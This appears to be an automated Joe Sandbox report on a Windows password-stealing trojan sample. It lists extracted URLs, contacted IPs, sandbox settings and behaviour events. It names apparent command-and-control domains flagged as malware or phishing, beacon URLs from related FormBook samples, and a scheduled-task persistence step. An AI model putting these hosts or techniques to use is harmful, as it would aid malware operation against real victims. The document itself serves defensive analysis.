00000000.00000003.392322140.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392547177.0000000005757000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/sSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.dulichphucbinh.com/co63/www.f1-austin-tickets.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.freepad168.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.inf9obase.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mattewigs.com/co63/www.dulichphucbinh.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.myccsmartmove.com/co63/www.takealicense.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.dlafluid.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.naspewt.xyz/co63/www.mattewigs.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: phishing
                                              		unknown
                                              http://www.cucinainvenice.comReferer:explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.sajatypeworks.com-SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.387837697.000000000575B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              http://www.fontbureau.com/designersGSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fontbureau.com/designers/?SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394212105.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers?SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.jiyu-kobo.co.jp/jp/HSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.saleschildcarriers.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.groexplorer.exe, 0000000F.00000000.478178422.00007FFA13109000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.vestostore.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.pym479.comReferer:explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.tiro.comSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.goodfont.co.krSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.inf9obase.com/co63/www.cucinainvenice.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.jiyu-kobo.co.jp/jp/=SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.cucinainvenice.com/co63/explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.fontbureau.comdiaSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395278067.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395526111.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394715282.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396031854.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395847311.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395411777.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395360507.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396121393.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395641687.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394343348.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394558568.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394288066.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395903699.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395479456.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395807046.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394466935.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396640059.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394791085.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394930632.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395753968.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394403535.0000000005757000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.typography.netDSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.galapagosdesign.com/staff/dennis.htmSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.399392378.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.399863925.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.402229452.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.403042832.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.400763636.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.403222822.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.401400253.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.401767137.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.399024629.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.398668360.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.400637848.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.399621408.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.399465444.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.401711594.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.400330810.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.400548672.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.400168473.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.398342627.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.399316118.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.398897872.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.400393573.000000000575A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://fontfabrik.comSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.takealicense.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.f1-austin-tickets.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.dulichphucbinh.com/co63/explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.fontbureau.comalsd~SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396031854.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395847311.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396121393.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395903699.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395807046.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396640059.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395753968.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395704173.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396210983.0000000005757000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		low
                                                    http://www.fontbureau.comrsivSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.401891749.0000000005757000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.comursivSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394212105.0000000005757000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.fonts.comSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.sandoll.co.krSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      76.223.26.96
                                                      		342284.parkingcrew.netUnited States
                                                      		16509AMAZON-02USfalse
                                                      184.94.215.140
                                                      		www.naspewt.xyzUnited States
                                                      		394896VXCHNGE-NC01UStrue
                                                      152.199.21.175
                                                      		sni1gl.wpc.lambdacdn.netUnited States
                                                      		15133EDGECASTUStrue
                                                      34.102.136.180
                                                      		dlafluid.comUnited States
                                                      		15169GOOGLEUSfalse
                                                      23.227.38.74
                                                      		shops.myshopify.comCanada
                                                      		13335CLOUDFLARENETUStrue
                                                      34.149.87.45
                                                      		td-ccm-neg-87-45.wixdns.netUnited States
                                                      		2686ATGS-MMD-ASUStrue
                                                      86.38.202.187
                                                      		vestostore.comLithuania
                                                      		15419LRTC-ASLTtrue
                                                      172.67.215.254
                                                      		www.saleschildcarriers.comUnited States
                                                      		13335CLOUDFLARENETUStrue

                                                      General Information

                                                      Joe Sandbox Version:38.0.0 Beryl
                                                      Analysis ID:1276619
                                                      Start date and time:2023-07-20 11:42:08 +02:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 14m 1s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:19
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample file name:SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@23/18@8/8
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HDC Information:
                                                      • Successful, ratio: 43.2% (good quality ratio 41.5%)
                                                      • Quality average: 68.8%
                                                      • Quality standard deviation: 29.2%
                                                      HCA Information:
                                                      • Successful, ratio: 99%
                                                      • Number of executed functions: 64
                                                      • Number of non-executed functions: 236
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240s for rundll32

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
                                                      • Excluded domains from analysis (whitelisted): 4zmf1gx83y.azureedge.net, ctldl.windowsupdate.com, 4zmf1gx83y.ec.azureedge.net
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • VT rate limit hit for: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      11:43:14API Interceptor1x Sleep call for process: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe modified
                                                      11:43:17API Interceptor49x Sleep call for process: powershell.exe modified
                                                      11:43:18Task SchedulerRun new task: hkkRsa path: C:\Users\user\AppData\Roaming\hkkRsa.exe
                                                      11:43:31API Interceptor1x Sleep call for process: hkkRsa.exe modified
                                                      11:43:45API Interceptor1458x Sleep call for process: explorer.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      76.223.26.96DHL_SHIPMENT_DOCUMENT.exeGet hashmaliciousFormBookBrowse
                                                      • www.v-erizon.com/gd30/?U6=Uq5HH5KV7w9bJfTsC2ub/884JvBiaQ3nqAxOT3bDvXdLqMOXNOAn0nyboFIc/YVNF19p&cL3taT=XV3tcZix2PVLy6Ap
                                                      Produktlistenreihenfolge_PDF.exeGet hashmaliciousFormBookBrowse
                                                      • www.pienso-mascotas.com/t3c9/
                                                      Facturas_Pagadas_al_Vencimiento.PDF.exeGet hashmaliciousFormBookBrowse
                                                      • www.itiscreenconnect.com/kbov/?ybbYU=lIAaItybSDBgNkcb&xXQ-=s8JSrOZXbW5Ph0/8NjAeKObCezI3PZAc8Pp5Byvo0TV++IfpVZg4C+j1GxiFi9CEeu10CVUCCBRFzEQUZASn6SPDHkHMgV9j5g==
                                                      presupuesto_PDF.exeGet hashmaliciousFormBookBrowse
                                                      • www.itiscreenconnect.com/kbov/?Ix4CZrj=s8JSrOZXbW5Ph0/8NjAeKObCezI3PZAc8Pp5Byvo0TV++IfpVZg4C+j1GxiFi9CEeu10CVUCCBRFzEQUZASn6SPDHkHMgV9j5g==&5Q=ig4viG0aegUg0XIH
                                                      http://bipatterns.comGet hashmaliciousUnknownBrowse
                                                      • ww155.bipatterns.com/track.php?domain=bipatterns.com&caf=1&toggle=answercheck&answer=yes&uid=MTY4Njc0MTk5OC44MjM5OjJkYzQxZDNmMjI3ODJkODA0YTQ2NzUwYWEwNWYzMTU2ZmZkYjI0NjY4NjZhMjZmMmU4YWZiN2YwM2NmNDJiYjc6NjQ4OWEzZWVjOTI0YQ%3D%3D
                                                      http://ww155.domionenergy.comGet hashmaliciousUnknownBrowse
